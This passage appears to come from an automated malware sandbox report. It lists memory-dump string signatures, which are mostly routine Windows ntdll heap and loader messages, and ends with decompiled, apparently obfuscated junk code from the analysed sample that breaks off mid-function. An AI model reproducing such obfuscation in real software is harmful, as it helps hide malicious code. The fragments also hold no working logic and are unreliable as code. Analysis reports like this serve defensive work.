            • Instruction Fuzzy Hash: 23028C759083598BD724CF24D488BABB7E4BFC8704F14892EE99997290E774D848CB93
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
            • API String ID: 0-2518169356
            • Opcode ID: 264faa90d7274904fb0eb3578e57a5f33970eeefa84e556fc9573c4cd68b00eb
            • Instruction ID: 2e853ca044f358eb7e63114252714b30ee661002bcf4cb4653f334c21754c940
            • Opcode Fuzzy Hash: 264faa90d7274904fb0eb3578e57a5f33970eeefa84e556fc9573c4cd68b00eb
            • Instruction Fuzzy Hash: 7191B072D106299BCB21CFA8C881AAEB7B0FF58710F194169E815FB350D735DE41CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: Item:$ Language:$ Name:$SR - $Type:
            • API String ID: 0-3082644519
            • Opcode ID: 296e0ff3f619cf59e165a4b69041df4ba3d33eda7f98a1c63c8fbe3f60a35723
            • Instruction ID: 4ac32e3ffcfc1b69758a48bcd93a111e20aa61a09b2a064b0bdd999b2eb6f9fd
            • Opcode Fuzzy Hash: 296e0ff3f619cf59e165a4b69041df4ba3d33eda7f98a1c63c8fbe3f60a35723
            • Instruction Fuzzy Hash: 39418071A006286BCB24DB69CD59BEAB7BCAF45304F4481E6B54CA7241DE30DE84CF91
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
            • API String ID: 0-188067316
            • Opcode ID: 59efaef6271355cd56c9111aa4929e97696a2bb393973a39c2b33c4945e7e81d
            • Instruction ID: 1759114b5ae31f234c619ce5d822c0dde1cac9834af3b15956949bb5f507f33e
            • Opcode Fuzzy Hash: 59efaef6271355cd56c9111aa4929e97696a2bb393973a39c2b33c4945e7e81d
            • Instruction Fuzzy Hash: 4E01FC3651A281AFD3169B69E41EF9377A4DBC1B34F29806EF2055B681CBB4DC40D112
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
            • API String ID: 0-3178619729
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: InitializeThunk
            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
            • API String ID: 2994545307-3570731704
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: #$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
            • API String ID: 0-3266796247
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 00A4DA2C
            • SsHd, xrefs: 00A033A5
            • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 00A4D9F6
            • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 00A4DA49
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
            • API String ID: 0-2905229100
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • HEAP[%wZ]: , xrefs: 00A522D7, 00A523E7
            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00A522F3
            • HEAP: , xrefs: 00A522E6, 00A523F6
            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00A52403
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
            • API String ID: 0-1657114761
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00A5A8BE
            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00A5A7E1, 00A5A8B9
            • SXS: %s() passed the empty activation context, xrefs: 00A5A7E6
            • .Local, xrefs: 00A1C9A4
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
            • API String ID: 0-1239276146
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$MUI${
            • API String ID: 0-3203766739
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00A53513
            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00A5348D
            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00A5344A
            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00A534D0
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
            • API String ID: 0-1468400865
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: InitializeThunk
            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
            • API String ID: 2994545307-2586055223
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: InitializeThunk
            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
            • API String ID: 2994545307-336120773
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
            • API String ID: 0-1391187441
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
            • API String ID: 0-4256168463
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: &$&$&
            • API String ID: 0-3101051865
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
            • API String ID: 0-3178619729
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
            • API String ID: 0-4253913091
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
            • API String ID: 0-1145731471
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00A49C18
            • LdrpDoPostSnapWork, xrefs: 00A49C1E
            • minkernel\ntdll\ldrsnap.c, xrefs: 00A49C28
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
            • API String ID: 0-1948996284
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: FilterFullPath$UseFilter$\??\
            • API String ID: 0-2779062949
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
            • API String ID: 0-1334570610
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • HEAP[%wZ]: , xrefs: 00A9254F
            • HEAP: , xrefs: 00A9255C
            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 00A9256F
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
            • API String ID: 0-3815128232
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • InstallLanguageFallback, xrefs: 009EE6DB
            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 009EE68C
            • @, xrefs: 009EE6C0
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
            • API String ID: 0-1757540487
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • HEAP[%wZ]: , xrefs: 00A542A2
            • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 00A542BA
            • HEAP: , xrefs: 00A542AF
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
            • API String ID: 0-1596344177
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
            • API String ID: 0-2558761708
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • @_EH4_CallFilterFunc@8.LIBCMT ref: 00A735C1
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: CallFilterFunc@8
            • String ID: @
            • API String ID: 4062629308-2766056989
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • 'LDR: %s(), invalid image format of MUI file , xrefs: 00A4A93C
            • LdrpLoadResourceFromAlternativeModule, xrefs: 00A4A937
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule
            • API String ID: 0-411237641
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • ResIdCount less than 2., xrefs: 00A568CA
            • Failed to retrieve service checksum., xrefs: 00A5686E
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
            • API String ID: 0-863616075
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: `$`
            • API String ID: 0-197956300
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: InitializeThunk
            • String ID: Legacy$UEFI
            • API String ID: 2994545307-634100481
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • LdrpResGetMappingSize Enter, xrefs: 00A184FA
            • LdrpResGetMappingSize Exit, xrefs: 00A1850C
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
            • API String ID: 0-1497657909
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: 0$Flst
            • API String ID: 0-758220159
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • RtlpResUltimateFallbackInfo Exit, xrefs: 009F61DD
            • RtlpResUltimateFallbackInfo Enter, xrefs: 009F61CE
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
            • API String ID: 0-2876891731
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 00A5B0B7
            • RtlpInitializeAssemblyStorageMap, xrefs: 00A5B0B2
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
            • API String ID: 0-2653619699
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: MUI
            • API String ID: 0-1339004836
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 63%
            			E0041D18D(void* __eax, signed int __ebx, void* __edx, signed int __edi, signed int __esi) {
            				void* _t86;
            				intOrPtr _t90;
            				signed int _t92;
            				signed int _t100;
            				signed char _t110;
            				signed char _t112;
            				signed int _t117;
            				signed int _t119;
            				intOrPtr _t120;
            				signed int _t127;
            
            				asm("sbb ecx, [0xa5bd8126]");
            				_t92 =  *0x80e8f561;
            				 *0x80e8f561 = __ebx;
            				asm("sbb [0xfd8f2e1b], edx");
            				_t110 = __edx +  *0x6f2eb8be;
            				asm("lodsb");
            				 *0x7e8be927 =  *0x7e8be927 >> 0x5a;
            				asm("sbb cl, 0x84");
            				_t117 = __edi |  *0x887d5ba9;
            				 *0xb1353c63 =  *0xb1353c63 ^ _t110;
            				_t100 =  *0xfec6f760 * 0x321f;
            				 *0x39311209 = _t92;
            				asm("sbb [0x3635d9c6], cl");
            				_t119 =  *0xc10b0abf;
            				 *0xc10b0abf = __esi;
            				asm("rcr dword [0x33ee310d], 0xae");
            				if((_t92 & 0x000000a2) == 0) {
            					L1:
            					_t120 = _t119 - 1;
            					_t112 = _t110 - 0x1f3b6309 & 0x0000000a;
            					asm("rol dword [0x61ebde0d], 0xff");
            					_t127 = _t100;
            					 *0xc0a94b6 = _t112;
            					 *0x50ed5fdc =  *0x50ed5fdc - _t112;
            					 *0xc1b3a1bf =  *0xc1b3a1bf & _t127;
            					 *0x350f2005 =  *0x350f2005 - _t127;
            					 *0x6e0daae6 =  *0x6e0daae6 << 0x13;
            					 *0xdf445f24 = (_t92 &  *0x5a741308) +  *0xca37bd61;
            					 *0xac6b76d = 0x529aaef4;
            					asm("stosd");
            					 *0x9e9065e1 =  *0x9e9065e1 >> 0x40;
            					asm("cmpsw");
            					_t86 = _t127;
            					 *0x7328f499 =  *0x7328f499 | _t117;
            					asm("rol byte [0xd3105bc6], 0x97");
            					 *0xb41b3126 =  *0xb41b3126 << 4;
            					_t110 =  *0x61b7ea81;
            					asm("sbb edx, [0x81430a29]");
            					_pop( *0xcc050afc);
            					 *0xaa00ad28 = _t110;
            					 *0x4fc2240a =  *0x4fc2240a - _t86;
            					_t100 = (((_t100 ^ 0x00000032) - 0x0000008a & 0x00000030) +  *0x86f48f2b &  *0x93d59938 ^  *0x3e8f5109) - 1;
            					_t117 = _t117 - 1;
            					_t92 =  *0xb7080a6b * 0x1e88;
            					 *0x498e842e = _t120;
            					_t119 = _t120 - 1;
            				} else {
            					__edx = 0xeb0c0b74;
            					__ecx = __ecx | 0x142da9db;
            					__eflags = __ecx;
            					__esi = 0x33ee300e;
            					if(__eflags == 0) {
            						goto L1;
            					} else {
            						 *0x370c0e74 =  *0x370c0e74 >> 0x5b;
            						_push(__esp);
            						asm("adc [0x2cf04711], esp");
            						asm("sbb [0x9fb52327], eax");
            						__ebp =  *0xeec1e8f;
            						if(__eflags > 0) {
            							goto L1;
            						} else {
            							 *0x22e32f77 =  *0x22e32f77 << 0xc8;
            							__eflags =  *0x22e32f77;
            							 *0xe7eb002e =  *0xe7eb002e >> 0xe6;
            							if( *0x22e32f77 < 0) {
            								goto L1;
            							} else {
            								0x33ee300e ^  *0xa90f3878 = (0x33ee300e ^  *0xa90f3878) + 1;
            								asm("sbb [0x725312ec], ebp");
            								asm("adc ecx, [0x1d756aa9]");
            								_pop(__edx);
            								asm("rcl dword [0xb50c3a8f], 0xc9");
            								_push(__esp);
            								__esp = __esp - 1;
            								_push(0x33ee300e);
            								asm("stosb");
            								__bh = __bh ^  *0x12636018;
            								asm("stosd");
            								__dl = __dl &  *0xb9324112;
            								__ecx = __ecx + 1;
            								__esi = (0x33ee300e ^  *0xa90f3878) + 1 - 1;
            								__eflags = __ch & 0x000000e7;
            								__ebp = __ebp &  *0xa28391ce;
            								asm("rcr byte [0xf8ce3b1], 0x39");
            								_push( *0x2a0d6361);
            								__eflags =  *0x15b5564 & __ebp;
            								asm("rcr dword [0x7ce4ed9f], 0x9c");
            								__ebx = __ebx -  *0xac3b136;
            								__bh = __bh |  *0x4b1bba10;
            								__edi = __edi + 1;
            								asm("adc bl, 0x82");
            								__eflags =  *0x20b120da & __ecx;
            								 *0x2f715bee = 0x33ee300e;
            								__esp = __esp - 1;
            								__edi =  *0x4e122966;
            								asm("adc esi, [0xfedf67cd]");
            								asm("stosb");
            								 *0x61d411e1 =  *0x61d411e1 & __ch;
            								__eflags =  *0x61d411e1;
            								if( *0x61d411e1 < 0) {
            									goto L1;
            								} else {
            									__edx = 0xeb0c0b74 ^  *0x11db5f72;
            									asm("adc ecx, [0x63691193]");
            									__ebx = __ebx - 1;
            									asm("rcr dword [0xef34b78f], 0x38");
            									__eflags =  *0x9d4cefd9 & __ebx;
            									 *0x1ae2549e =  *0x1ae2549e ^ __ebx;
            									__dl = __dl &  *0x27d41600;
            									asm("adc [0xded2ae86], ah");
            									__ebx = __ebx + 1;
            									__eflags = __ebx;
            									asm("sbb ecx, [0x5575b406]");
            									asm("adc [0x9fcdc9f1], eax");
            									if(__ebx >= 0) {
            										goto L1;
            									} else {
            										asm("sbb esi, 0x94312f79");
            										asm("rcr dword [0x5e053c61], 0xbf");
            										__edx = __edx ^  *0x86406c5;
            										__eflags = 0xeb0c0b74;
            										if(0xeb0c0b74 < 0) {
            											goto L1;
            										} else {
            											__edx =  *0x37a5347c * 0xb119;
            											_push(__eax);
            											__edx =  *0x37a5347c * 0xb119 - 1;
            											__eflags = __edx;
            											_push(__ebp);
            											_push(__edx);
            											__eax = 0x73c0083e;
            											if(__edx < 0) {
            												goto L1;
            											} else {
            												 *0xc990372 =  *0xc990372 >> 0x35;
            												__eax = 0x73c0083e +  *0x5da34183;
            												__bl = __bl + 0xd0;
            												__esp =  *0x3e82d369 * 0x72ce;
            												asm("stosb");
            												 *0x8f456d =  *0x8f456d >> 0xea;
            												asm("sbb [0x9f1da82c], cl");
            												__ebp = 0x991b4915;
            												__dl = __dl +  *0xc683bf30;
            												__dh = __dh ^ 0x000000e0;
            												asm("adc esi, [0x5609ebb9]");
            												asm("sbb eax, [0x1c9530b8]");
            												asm("sbb [0x2d159ee5], dh");
            												__ecx = __ecx + 0x2999a1a1;
            												__ecx = __ecx + 1;
            												 *0x50e5fe3e =  *0x50e5fe3e + __edi;
            												__ah =  *0xeeb6f710;
            												__eflags = 0x991b4915 -  *0x9a172164;
            												__bh = __bh -  *0x3e79d92a;
            												__bh = __bh -  *0x33902be3;
            												asm("adc ecx, [0xffb86b35]");
            												__esi = __esi + 0x322bda1e;
            												__bh = __bh ^  *0xcd8c39f2;
            												asm("rcr dword [0x8df301c7], 0x2d");
            												 *0xb2234ae2 =  *0xb2234ae2 - __al;
            												__cl = __cl | 0x00000034;
            												__ch = __ch ^  *0xbe68e100;
            												__eflags = __ch;
            												if(__ch != 0) {
            													goto L1;
            												} else {
            													 *0x7998ee7a =  *0x7998ee7a + __esp;
            													 *0x767df800 =  *0x767df800 >> 0xef;
            													_pop(__ebp);
            													asm("sbb [0x94207c1e], edx");
            													__esp = __esp - 1;
            													__esp = __esp ^ 0xcec6b592;
            													__ebp = 0x991b4915 -  *0x8d265623;
            													__edx = __edx + 1;
            													_pop(__edx);
            													__ebp = 0x991b4915 -  *0x8d265623 +  *0x8e4fe3f8;
            													__esp =  *0x90538dee;
            													__eax = __eax + 0x431e059c;
            													asm("ror byte [0x5aafbb4], 0x82");
            													__esp =  *0x3cb5d16;
            													asm("stosb");
            													__ebx = __ebx ^  *0xcb613205;
            													 *0x7e05aa04 =  *0x7e05aa04 >> 0xcd;
            													 *0xaaf801d2 =  *0xaaf801d2 + __ah;
            													asm("adc edi, [0x5d1b205]");
            													asm("sbb edx, [0x3e05aafa]");
            													__esp =  *0xaa0ad960 * 0x8103;
            													 *0x170450b1 =  *0x170450b1 | __bh;
            													_pop( *0x4c2c227);
            													__ebp = 0x991b4915 -  *0x8d265623 +  *0x8e4fe3f8 ^  *0xc2bd4a8b;
            													 *0xb7389904 =  *0xb7389904 + __bl;
            													__ecx = __ecx & 0x316604c2;
            													__eflags =  *0x7505c2b5 & __cl;
            													asm("sbb ebp, 0xaa0ece15");
            													asm("rol dword [0xcd295105], 0x5e");
            													asm("rol byte [0xf405aa04], 0x13");
            													_t26 = __ecx;
            													__ecx =  *0xaa06d46f;
            													 *0xaa06d46f = _t26;
            													asm("adc [0xb4134d07], esp");
            													asm("sbb [0xe2160566], ebx");
            													 *0xb60c5707 =  *0xb60c5707 | __edi;
            													_pop(__ebp);
            													 *0x7e214f8 =  *0x7e214f8 | __edi;
            													asm("rcl dword [0x83197168], 0xbb");
            													__eax = __eax |  *0x7e21a06;
            													__eax = __eax |  *0x28c92829;
            													asm("rcl byte [0x8e22263], 0x2b");
            													__edi = __edi - 0x7ced4d31;
            													 *0xca2f3022 =  *0xca2f3022 >> 0x78;
            													__al = __al +  *0x421db308;
            													asm("adc esp, [0x19a55b29]");
            													__al = __al &  *0xe93108ca;
            													_push( *0xaa0ad960 * 0x8103);
            													_push( *0x243265dc);
            													__bl = __bl &  *0xd52b08ca;
            													 *0xb15f1b22 = __dh;
            													__eflags =  *0x7a09ca1d & __esp;
            													__esp = __esp ^  *0xd0b36dfd;
            													asm("rcl byte [0xad2490a], 0x11");
            													__ebp = (0x991b4915 -  *0x8d265623 +  *0x8e4fe3f8 ^  *0xc2bd4a8b) -  *0xe6c76109;
            													 *0xae26ad7 =  *0xae26ad7 >> 0x48;
            													__edi = __edi -  *0xe9090aba;
            													__esi = __esi +  *0x998afc11;
            													 *0xacd2ffe =  *0xacd2ffe + __edx;
            													_t29 = __ch;
            													__ch =  *0xb3fd410a;
            													 *0xb3fd410a = _t29;
            													__bh = __bh -  *0xc3d6993c;
            													asm("lodsb");
            													(0x991b4915 -  *0x8d265623 +  *0x8e4fe3f8 ^  *0xc2bd4a8b) -  *0xe6c76109 + 1 =  *0xec00b6b * 0x2329;
            													_push( *0xab057868);
            													__al = __al &  *0x874f63c;
            													__edx = __edx ^ 0x470d6bed;
            													asm("sbb edi, [0xca253465]");
            													asm("rcl dword [0x349f5711], 0x9");
            													__eflags =  *0xafaa10bf & __ecx;
            													__bl = __bl +  *0x7a7aba24;
            													asm("rol byte [0xd627fc22], 0x39");
            													__edx = __edx - 1;
            													asm("adc [0xe7bf14ff], esp");
            													 *0x3bf3defb =  *0x3bf3defb - 0x33ee300e;
            													__eflags =  *0x3bf3defb;
            													if( *0x3bf3defb < 0) {
            														goto L1;
            													} else {
            														__esp =  *0xfd7f777c * 0x159c;
            														asm("lodsd");
            														__esi = 0x12e80e9e;
            														asm("sbb esi, [0xe77f2efa]");
            														 *0x13ef9725 =  *0x13ef9725 << 0x61;
            														 *0x47cd91ef =  *0x47cd91ef << 0x1b;
            														 *0x51045930 =  *0x51045930 << 0x64;
            														_push(__edx);
            														__dh = __dh + 0x63;
            														__eflags = __ebx - 0x259b30b;
            														__bl = 0x3c;
            														__eflags = __esp - 0x8cd29483;
            														__ebp =  *0x6740360 * 0xbf0e;
            														__eflags = __esp -  *0x35f4d495;
            														__ch = __ch +  *0xba587e0c;
            														__eax = __eax + 1;
            														__dl = __dl -  *0x30a3ea88;
            														asm("sbb [0xc100c867], eax");
            														__eflags = __ecx & 0xc1b38a07;
            														if((__ecx & 0xc1b38a07) < 0) {
            															goto L1;
            														} else {
            															__ecx = __ecx -  *0xe2d9be78;
            															asm("adc eax, [0xafc4c116]");
            															_t34 = __bh;
            															__bh =  *0x595d08f9;
            															 *0x595d08f9 = _t34;
            															__ecx = __ecx ^  *0xc34aa8db;
            															__edi = 0xaeca3ed9;
            															 *0xeaba7427 =  *0xeaba7427 ^ 0x73c0083e;
            															__eflags =  *0xeaba7427;
            															_pop(__ecx);
            															_push( *0xb711c70f);
            															 *0xe34a461d = __ebp;
            															if( *0xeaba7427 != 0) {
            																goto L1;
            															} else {
            																__edx = __edx -  *0xca1b475;
            																__esp = __esp + 0xf8fcead6;
            																__eflags = 0xaeca3ed9 -  *0xff071b16;
            																__ch = __ch - 0x1c;
            																 *0xbb43201d =  *0xbb43201d >> 0x26;
            																__dh = __dh + 0xe5;
            																__edi =  *0x77d5996f;
            																 *0x77d5996f = 0xaeca3ed9;
            																__edi =  *0xc6ffe660 * 0xedf1;
            																__esi = 0x12e80e9e |  *0xec4fe325;
            																 *0x727adabd =  *0x727adabd << 0xa2;
            																L1();
            																_pop( *0x665828e8);
            																__eflags = __ecx -  *0x82d11097;
